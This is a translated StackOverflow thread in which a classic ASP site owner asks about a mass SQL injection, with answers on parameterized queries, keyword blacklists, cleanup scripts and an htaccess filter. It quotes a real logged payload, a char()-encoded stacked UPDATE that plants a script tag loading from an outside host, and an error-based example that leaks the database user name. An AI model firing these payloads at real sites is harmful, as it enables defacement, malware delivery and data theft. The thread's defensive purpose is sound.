Note: this page is a Chinese-English translation of a popular StackOverflow question, provided under the CC BY-SA 4.0 license. If you reuse it you must follow the same CC BY-SA license, cite the original URL and author information, and attribute it to the original author (not me). StackOverflow original: http://stackoverflow.com/questions/3788080/
Warning: these are provided under cc-by-sa 4.0 license. You are free to use/share it, but you must attribute it to the original authors (not me): StackOverFlow

Date: 2020-10-25 02:14:37  Source: igfitidea

Attack on ASP site that uses a SQL server database

Tags: javascript, sql-server, asp-classic, query-string

Asked by David

We have a survey site that was apparently attacked. The symptoms are identical to what was described on the following page on this site: XSS Attack on the ASP.NET Website.


I found multiple entries in our IIS logs that included the malicious code:


</title> < script src = http : // google-stats49.info/ur.php >.

Here is an example of the value of the cs-uri-query field for one of the IIS log entries.


surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--

I don't understand how the above code works but apparently this is what is being sent in a query string to corrupt columns in our database tables. We have shut down our site for the time being. We can remove the scripts from the database but that doesn't prevent it from being corrupted again when we bring the site back online.


Does anyone have any suggestions on how to prevent this from happening?

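The question asks how the logged query works. The script below is an added example, not code from the question or from any answer: it runs under cscript on Windows, takes the cs-uri-query value quoted above (embedded as a constructed copy) and rebuilds the SQL the server actually received, turning every char(NN)%2Bchar(NN)... run back into the string it hides. Function and variable names are my own. Decoding this entry shows the shape of the attack: the value starts with the expected 91, then a second, stacked UPDATE that the page concatenated into its own statement, and a trailing -- that comments out whatever followed. The long char() run decodes to `</title><script src=http://google-stats50.info/ur.php></script>`; in this particular entry that text is the search argument of REPLACE and char(32) (a single space) is the replacement, so this UPDATE rewrites categoryName on every row of usd_ResponseDetails. Entries that insert the tag decode the same way.

```vbscript
' decode_char_payload.vbs  --  added example, not from the question or any answer.
' Run with:  cscript //nologo decode_char_payload.vbs
' Rebuilds the text hidden in the char(NN)%2Bchar(NN)... runs of an IIS
' cs-uri-query value so a defender can read what the injected UPDATE did.
' Works offline on the constructed sample below; nothing is sent anywhere.
Option Explicit

' \b keeps "varchar(8000)" from being mistaken for a char() call.
Const CHAR_RUN_PATTERN = "\bchar\(\d+\)(%2Bchar\(\d+\))*"

' Returns the MatchCollection of every char(NN)%2Bchar(NN)... run in field.
Function FindCharRuns(field)
    Dim re
    Set re = New RegExp
    re.Global = True
    re.IgnoreCase = True
    re.Pattern = CHAR_RUN_PATTERN
    Set FindCharRuns = re.Execute(field)
End Function

' Maps every char(NN) inside one run to Chr(NN) and concatenates the result.
Function DecodeCharRun(run)
    Dim re, m, text
    Set re = New RegExp
    re.Global = True
    re.IgnoreCase = True
    re.Pattern = "\bchar\((\d+)\)"
    text = ""
    For Each m In re.Execute(run)
        text = text & Chr(CInt(m.SubMatches(0)))
    Next
    DecodeCharRun = text
End Function

' Renders the cs-uri-query value as the SQL text the server received:
' each char() run becomes a quoted literal, the "+" that IIS writes for a
' space becomes a space again, and "%2B" becomes a literal plus sign.
' Other percent-escapes are not handled because this sample has none.
Function DecodeQueryField(field)
    Dim sql, m
    sql = field
    For Each m In FindCharRuns(field)
        sql = Replace(sql, m.Value, "'" & Replace(DecodeCharRun(m.Value), "'", "''") & "'")
    Next
    sql = Replace(sql, "+", " ")
    DecodeQueryField = Replace(sql, "%2B", "+")
End Function

' Constructed copy of the cs-uri-query value quoted in the question.
Dim rawQuery, m
rawQuery = "surveyID=91+update+usd_ResponseDetails+set+categoryName=REPLACE(cast(categoryName+as+varchar(8000))," & _
    "cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2B" & _
    "char(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2B" & _
    "char(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2B" & _
    "char(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2B" & _
    "char(101)%2Bchar(45)%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2B" & _
    "char(48)%2Bchar(46)%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2B" & _
    "char(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2B" & _
    "char(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))," & _
    "cast(char(32)+as+varchar(8)))--"

WScript.Echo "SQL the database received:"
WScript.Echo DecodeQueryField(rawQuery)
WScript.Echo ""
For Each m In FindCharRuns(rawQuery)
    WScript.Echo "char() run decodes to: [" & DecodeCharRun(m.Value) & "]"
Next
```

The same two functions can be pointed at any cs-uri-query column pulled from the IIS logs; a line whose decoded form contains a second statement after the expected parameter value identifies the page that concatenates that parameter into SQL.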

Answered by Cfreak

That's a SQL injection.


  1. Never trust user input. You're taking input and sending it directly to the database
  2. Never trust your user input!
  3. Check all input against a whitelist of allowed values.
  4. For text input make sure everything is escaped

There is tons on this subject: Google is your friend


Answered by Nikki9696

Also...


  1. Use parameterized queries.
  2. Get off old classic ASP, which makes it harder to use parameterized queries. Move to .NET, which has easier validation and can restrict values, disallow html input and so on.

Answered by rustySamurai

Not sure if this is still relevant for you, but I have had this happen in the past as we still run some old asp sites. There are two things you need to clean this up. First is a find and replace stored procedure for your database (easy enough to Google this), if you can get away with it. Unfortunately sometimes the data is cut off depending on the field type, but there is nothing to do here. Otherwise a roll back for your db is necessary.


Second is insert a SQL injection hack prevention script like this as an include before your database connection:


Good luck.


<%
'  SqlCheckInclude.asp
'
'  This is the include file to use with your asp pages to
'  validate input for SQL injection.

Dim BlackList, ErrorPage, s

'
' Below is a black list that will block certain SQL commands and
' sequences used in SQL injection; it will help with input sanitization.
'
' However this may not suffice, because:
' 1) These might not cover all the cases (like encoded characters)
' 2) This may disallow legitimate input
'
' Creating raw sql query strings by concatenating user input is
' unsafe programming practice. It is advised that you use parameterized
' SQL instead. Check http://support.microsoft.com/kb/q164485/ for information
' on how to do this using ADO from ASP.
'
' Moreover, you need to also implement a white list for your parameters.
' For example, if you are expecting input for a zipcode you should create
' a validation rule that will only allow 5 characters in [0-9].
'

' "/*" and "*/" are the SQL block-comment delimiters.
BlackList = Array("--", ";", "/*", "*/", "@@", "@", _
                  "char", "nchar", "varchar", "nvarchar", _
                  "alter", "begin", "cast", "create", "cursor", _
                  "declare", "delete", "drop", "end", "exec", _
                  "execute", "fetch", "insert", "kill", "open", _
                  "select", "sys", "sysobjects", "syscolumns", _
                  "table", "update")

' Populate the error page you want to redirect to in case the
' check fails.
ErrorPage = "/ErrorPage.asp"

'''''''''''''''''''''''''''''''''''''''''''''''''''
' This function does not check for encoded characters
' since we do not know the form of encoding your application
' uses. Add the appropriate logic to deal with encoded characters
' in here
'''''''''''''''''''''''''''''''''''''''''''''''''''
Function CheckStringForSQL(str)
    On Error Resume Next

    ' Local loop variable so the function does not clobber the
    ' page-level "s" used by the request loops below.
    Dim lstr, pattern

    ' An empty or missing value cannot contain an injection: return false
    If ( IsEmpty(str) ) Then
        CheckStringForSQL = false
        Exit Function
    ElseIf ( StrComp(str, "") = 0 ) Then
        CheckStringForSQL = false
        Exit Function
    End If

    lstr = LCase(str)

    ' Check if the string contains any patterns in our
    ' black list
    For Each pattern in BlackList
        If ( InStr(lstr, pattern) <> 0 ) Then
            CheckStringForSQL = true
            Exit Function
        End If
    Next

    CheckStringForSQL = false
End Function

'''''''''''''''''''''''''''''''''''''''''''''''''''
' Check forms data
'''''''''''''''''''''''''''''''''''''''''''''''''''
For Each s in Request.Form
    If ( CheckStringForSQL(Request.Form(s)) ) Then
        ' Redirect to an error page (Response.Redirect also ends processing)
        Response.Redirect(ErrorPage)
    End If
Next

'''''''''''''''''''''''''''''''''''''''''''''''''''
' Check query string
'''''''''''''''''''''''''''''''''''''''''''''''''''
For Each s in Request.QueryString
    If ( CheckStringForSQL(Request.QueryString(s)) ) Then
        ' Redirect to error page
        Response.Redirect(ErrorPage)
    End If
Next

'''''''''''''''''''''''''''''''''''''''''''''''''''
' Check cookies
'''''''''''''''''''''''''''''''''''''''''''''''''''
For Each s in Request.Cookies
    If ( CheckStringForSQL(Request.Cookies(s)) ) Then
        ' Redirect to error page
        Response.Redirect(ErrorPage)
    End If
Next

'''''''''''''''''''''''''''''''''''''''''''''''''''
' Add additional checks for input that your application
' uses. (for example various request headers your app
' might use)
'''''''''''''''''''''''''''''''''''''''''''''''''''
%>
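Nikki9696's answer and the comment block inside the include above both point at the real fix: validate each parameter against an allow-list and send it to SQL Server as a typed ADO parameter rather than concatenating it into the statement. The page below is an added example, not code from any answer and not part of Microsoft's include. It assumes the survey page reads surveyID from the query string and selects from usd_ResponseDetails.categoryName (the table and column named in the question); the SELECT and the connection string are placeholders for your own, and the ADO constants are the standard enum values. The `91+update+...` value from the question fails the digits-only check before any SQL is built, and even if it reached the database it would be bound as an integer, never parsed as SQL text.

```vbscript
<%
' survey_hardened.asp  --  added example, not code from any answer or from the include above.
' Validates surveyID against an allow-list (decimal digits only) and binds it
' as a typed ADO parameter, so the value can never be parsed as SQL text.
' Assumptions: the page reads surveyID from the query string and selects
' usd_ResponseDetails.categoryName (names from the question); the query and
' the connection string are placeholders for your own.
Option Explicit

' Standard ADO enum values, spelled out so adovbs.inc is not required
Const adCmdText    = 1
Const adInteger    = 3
Const adParamInput = 1

' Allow-list: one to nine decimal digits and nothing else.
' "91 update usd_ResponseDetails ..." fails this check before SQL is involved.
Function IsValidSurveyId(value)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    IsValidSurveyId = re.Test(value)
End Function

' Runs the lookup with a typed parameter instead of string concatenation.
' Returns the category names as an HTML fragment, encoded on output so a value
' that was tampered with in the database still cannot run as script.
Function LoadCategoryNames(conn, surveyId)
    Dim cmd, rs, html
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    cmd.CommandText = "SELECT categoryName FROM usd_ResponseDetails WHERE surveyID = ?"
    cmd.Parameters.Append cmd.CreateParameter("surveyID", adInteger, adParamInput, , CLng(surveyId))
    Set rs = cmd.Execute
    html = ""
    Do Until rs.EOF
        html = html & Server.HTMLEncode(rs("categoryName") & "") & "<br>"
        rs.MoveNext
    Loop
    rs.Close
    LoadCategoryNames = html
End Function

' ---- request handling ----
Dim surveyId, conn
surveyId = Trim(Request.QueryString("surveyID") & "")

If Not IsValidSurveyId(surveyId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid survey id."
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
' Placeholder connection string: replace with your own, ideally a login that
' has no UPDATE rights on tables this page only reads.
conn.Open "Provider=SQLOLEDB;Data Source=YOUR_SERVER;Initial Catalog=YOUR_DB;Integrated Security=SSPI;"
Response.Write LoadCategoryNames(conn, surveyId)
conn.Close

' The pattern this replaces, kept as a comment only to show the difference:
'   Set rs = conn.Execute("SELECT categoryName FROM usd_ResponseDetails WHERE surveyID = " & Request.QueryString("surveyID"))
%>
```

Two design points: the allow-list runs before the parameter is built, so a rejected request never touches the database; and the database login used by a read-only page should lack UPDATE on the tables it reads, which would have limited this attack to a failed statement even on a page that still concatenates.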

Answered by Francesco Rapanà

Configure your IIS to send a custom error page or the default error 500 page instead of sending detailed error messages to the client.


Detailed error messages have been used to find the db schema. Then they used SQL injection to update text fields.


Here's an example to get the DB user:


/page.asp?realparameter=1And%20char(94)%2Buser%2Bchar(94)=0 

that is "and ^+user+^=0" and it returns:


[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Conversion_failed_when_converting_nvarchar_value_'^myDbUsername^'_to_data_type_int.


where "myDbUsername" is your real database user.


Using a similar technique it is possible to get databases, tables, columns, types etc. one by one.


If you have not been already attacked then disable detailed errors in IIS, otherwise check your logs to find which pages have sql injection vulnerabilities and correct them.


I wrote a small script to check if there are "<script" in my database:


-- Builds one COUNT(*) query per character column (views excluded), runs each,
-- and lists the rows of every column that still contains "<script".
DECLARE c1 CURSOR FOR
    SELECT 'SELECT COUNT(*), ''' + QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) + ''', ''' + QUOTENAME(COLUMN_NAME) + '''' +
           ' FROM ' + QUOTENAME(TABLE_SCHEMA) + '.' + QUOTENAME(TABLE_NAME) +
           ' WHERE ' + QUOTENAME(COLUMN_NAME) + ' LIKE ''%<script%'''
    FROM INFORMATION_SCHEMA.COLUMNS c
    WHERE DATA_TYPE IN ('nvarchar', 'nchar', 'varchar', 'char', 'text', 'ntext')
      AND QUOTENAME(TABLE_NAME) NOT IN (SELECT QUOTENAME(name) AS TABLE_NAME FROM sys.views)
    ORDER BY QUOTENAME(TABLE_NAME);
-- MAX sizes so long schema, table and column names cannot truncate the generated SQL
DECLARE @CMD VARCHAR(MAX), @return VARCHAR(10)
OPEN c1
FETCH NEXT FROM c1 INTO @CMD
WHILE @@FETCH_STATUS <> -1
    BEGIN
        DECLARE @sql NVARCHAR(MAX), @tbl VARCHAR(200), @col VARCHAR(200)
        -- the generated SELECT becomes the body of a second cursor
        SET @sql = 'DECLARE c2 CURSOR FOR ' + @CMD
        EXEC sp_executesql @sql
        OPEN c2
        FETCH NEXT FROM c2 INTO @return, @tbl, @col
        WHILE @@FETCH_STATUS <> -1
            BEGIN
            IF (@return > 0)
                BEGIN
                    PRINT @return + ' records found in ' + @tbl + '.' + @col
                    -- @tbl and @col are already QUOTENAME()d by the generated query
                    EXEC('SELECT ' + @col + ' FROM ' + @tbl + ' WHERE ' + @col + ' LIKE ''%<script%''')
                END
            FETCH NEXT FROM c2 INTO @return, @tbl, @col
            END
        CLOSE c2
        DEALLOCATE c2
        FETCH NEXT FROM c1 INTO @CMD
    END
CLOSE c1
DEALLOCATE c1

I'm on IIS 7, Win Server 2008 and SQL Server 2008, so it doesn't seem this attack uses any SQL Server 2003 / 2005 vulnerabilities as stated in many articles on the web.


Answered by Thomas at GTISC

You are being hit by the LizaMoon automated SQL injection exploit pack, and are now mentioned in an article on the page of the company that is credited with first documenting the attack: http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx


Answered by Ed-AITpro

The BulletProof Security WordPress plugin has the SQL Injection filters that will block this attack in an htaccess file. Since you have an IIS server you would need to add additional features that would enable you to use an htaccess file or maybe you could incorporate the SQL Injection filters in some other way with IIS since htaccess is traditionally an Apache thing. This is the line in the BulletProof Security master htaccess file that blocks ALL SQL Injection hacking attempts:


RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|select|insert|union|declare|drop|delete|create|alter|update|order|char|set|cast|convert|meta|script|truncate).* [NC] 
RewriteRule ^(.*)$ - [F,L]